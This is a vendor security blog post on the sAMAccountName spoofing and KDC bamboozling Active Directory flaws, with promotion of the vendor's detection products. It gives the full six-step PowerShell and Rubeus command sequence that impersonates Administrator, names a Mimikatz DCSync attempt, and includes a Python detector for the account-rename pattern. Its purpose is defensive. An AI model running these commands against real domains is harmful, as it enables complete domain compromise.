Preventing sAMAccountName spoofing and KDC bamboozling

Biju Varghese, published in AttivoTechBlogs, Dec 23, 2021

The year 2021 has been challenging for users of Microsoft Active Directory. From late December 2020, we saw significant vulnerability disclosures like Zerologon and PrintNightmare that attackers could use to take over an entire domain. Two more vulnerability disclosures this month make things worse. The sAMAccountName spoofing and KDC bamboozling vulnerabilities have made an attacker’s life easy, as they have publicly available exploit code. Microsoft has released security patches for these vulnerabilities, and we strongly urge everyone to deploy them at the earliest to protect themselves from domain compromise.

These Active Directory vulnerabilities clearly show that AD security is an unexplored area, and we will see many more in the coming years. For an attacker, compromising AD, the most used identity platform, gives them complete control over an enterprise and motivates them to discover newer vulnerabilities. To truly protect Active Directory, organizations need to employ a multipronged approach.

Hardening Active Directory — Discover exposures, misconfigurations, vulnerabilities, and excessive privileges in your Active Directory environment and remediate them at the earliest and reduce your Attack Surface.

Prevent Active Directory reconnaissance — Attackers compromise a domain-joined system and use the basic domain privileges that come with it to discover privileged AD objects, then perform privilege escalation and lateral movement. Attackers can get significant information about an organization’s privileged accounts, delegated admin accounts (AD ACLs), critical servers and the services they run (e.g., databases), and service accounts. Concealing AD objects from unauthorized access prevents an attacker from performing privilege escalation and lateral movement.

Prevent Domain Compromise — Once attackers discover privileged accounts, they steal credentials like passwords, hashes, and Kerberos tickets, or perform brute-force attacks like password spraying. Once an attacker gains higher privileges or finds a vulnerability in AD, they use techniques such as Golden Ticket, Silver Ticket, and Domain Replication (DCSync) attacks to take over the AD and compromise all systems it manages, including rapid deployment of ransomware.

Attivo’s Identity Detection and Response (IDR) products prevent AD reconnaissance, identity theft, attacks on Active Directory, and risky entitlements that create attack paths. The Attivo research team ran the exploit steps described in the article “CVE-2021-42287/CVE-2021-42278 Weaponization” in an environment with the Attivo IDR solutions deployed. As expected, the solutions prevented the attacks, as designed.

In this exploit, the first step is to “Create a Machine account in the domain.” By default, AD allows any standard or regular user to join systems to the AD domain. The ADAssessor product, one of the Attivo IDR solutions, proactively flags it as a security exposure when standard or regular users can add systems to the domain.

Below are the steps an attacker could follow to compromise a domain:

Step 1: Create a Machine account in the domain

Command: New-MachineAccount -MachineAccount TestSPN6 -Domain Acme-labs.local -DomainController acm-rt-dns-01.Acme-Labs.Local -Verbose

Attivo customers who use the ADAssessor solution and have restricted the privilege to join systems to the domain are safe from this exploit as the first step of the attack will fail.

If attackers cannot leverage Step 1 or want to avoid detection, they can use an existing computer object with “modify” permission, then proceed to Steps 2 and 3 for the next attack stage.

Most AD assessments Attivo performed found this exposure and helped customers remediate it.

Step 2: Clearing SPNs

In this step, attackers with the “modify” privilege would change an existing computer object.

Command: Set-DomainObject "CN=TestSPN6,CN=Computers,DC=acme-labs,DC=local" -Clear 'serviceprincipalname' -Verbose

Step 3: Change Machine Account sAMAccountName

Command: Set-MachineAccountAttribute -MachineAccount TestSPN6 -Value "acm-rt-dns-01" -Attribute samaccountname -Verbose

Yet again, the ADAssessor solution played an essential role in detecting misconfigured permissions on critical containers like “Computers.”

Customers who have taken proactive measures to remediate such misconfigured permissions will protect themselves from the vulnerabilities described in Steps 2 and 3, leaving the exploit unsuccessful.

If a customer is vulnerable in the previous steps, the attackers will proceed to the next steps. Steps 4 to 6 are crucial because the attackers will impersonate “Administrator,” enabling a complete privilege escalation.

Step 4: Request TGT

The attackers request a TGT for the domain controller machine account. The example below uses the application Rubeus.

Command: .\Rubeus.exe asktgt /user:IDC1 /password:Password1 /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /nowrap

Step 5: Change Machine Account sAMAccountName

The attackers modify the “sAMAccountName” value of the machine account created in Step 1, restoring its original name.

Command: Set-MachineAccountAttribute -MachineAccount TestSPN -Value "TestSPN" -Attribute samaccountname -Verbose

Step 6: Request S4U2self

The attackers try to get a TGT impersonating “Administrator.”

Command: .\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:idc1.internal.zeroday.lab /self /altservice:LDAP/IDC1.internal.zeroday.lab /ptt /ticket:[TGT]
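Steps 3 and 5 leave a distinctive trace in the Security log: a machine account is renamed to a name without the trailing “$” (one that matches a domain controller) and then renamed back minutes later. The following added example, which is not part of the original article or of the Attivo products, shows detection logic for that pattern over constructed sample events modelled on Windows Security event 4781 (“The name of an account was changed”); the event field names follow that event’s schema, and the domain controller inventory is an assumed input.

```python
from datetime import datetime, timedelta

# Constructed sample events modelled on Windows Security event 4781.
# Field names follow the event's EventData schema; the values are made up.
SAMPLE_EVENTS = [
    {"TimeCreated": "2021-12-20T10:01:02", "SubjectUserName": "jdoe",
     "OldTargetUserName": "TestSPN6$", "NewTargetUserName": "acm-rt-dns-01"},
    {"TimeCreated": "2021-12-20T10:03:15", "SubjectUserName": "jdoe",
     "OldTargetUserName": "acm-rt-dns-01", "NewTargetUserName": "TestSPN6$"},
    {"TimeCreated": "2021-12-20T11:00:00", "SubjectUserName": "helpdesk",
     "OldTargetUserName": "WS-OLD$", "NewTargetUserName": "WS-NEW$"},
]

# Assumed inventory of domain controller hostnames (lower-case, without '$').
DOMAIN_CONTROLLERS = {"acm-rt-dns-01", "idc1"}


def rename_alerts(events, dcs=DOMAIN_CONTROLLERS, window=timedelta(minutes=30)):
    """Return (event_index, reason) pairs for renames matching the spoofing pattern."""
    alerts = []
    recent = []  # (time, subject, new_name) of earlier renames, for revert correlation
    for i, ev in enumerate(events):
        t = datetime.fromisoformat(ev["TimeCreated"])
        old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
        # 1. A machine account losing its trailing '$' is the core of the spoof (Step 3).
        if old.endswith("$") and not new.endswith("$"):
            alerts.append((i, "machine account renamed to a name without trailing '$'"))
        # 2. The new name (with or without '$') matches a DC, which the KDC will resolve to.
        if new.rstrip("$").lower() in dcs:
            alerts.append((i, "new name matches a domain controller hostname"))
        # 3. The same subject renames the account back within the window (Step 5).
        for t0, subj, prev_new in recent:
            if subj == ev["SubjectUserName"] and prev_new == old and t - t0 <= window:
                alerts.append((i, "account renamed back shortly after an earlier rename"))
                break
        recent.append((t, ev["SubjectUserName"], new))
    return alerts


if __name__ == "__main__":
    for idx, reason in rename_alerts(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(ev["OldTargetUserName"], "->", ev["NewTargetUserName"], ":", reason)
```

The third sample event, an ordinary workstation rename that keeps the trailing “$”, produces no alert, while the rename pair from the exploit produces three.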

The Attivo IDR solutions include the ADSecure solution and the Credential Protection function. These prevent attackers from stealing credentials like Kerberos tickets and hashes, preventing them from succeeding and protecting customers.

The ADSecure solution blocks the attacker from using a stolen Kerberos Ticket and raises a Pass-The-Ticket attack event.

The Credential Protection feature prevented the attacker from reading credentials from LSASS memory, raising an Unauthorized Credential Access event.

Finally, we can see the exploit using Mimikatz to perform a DCSync attack failing with the error “ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)” on the compromised endpoint.

Conclusion

Considering the number of attacks on Active Directory by ransomware operators and the volume of disclosed vulnerabilities this year, there is an urgent need to secure Active Directory by investing in the right set of tools.

Attivo Identity Detection and Response Solutions

Attivo Networks has leveraged its deep experience in privilege escalation and lateral movement detection to become a significant player in the IDR space. The company has secured its leadership position based on its broad portfolio of IDR solutions in the last year.

Learn more about Attivo’s identity solutions here.
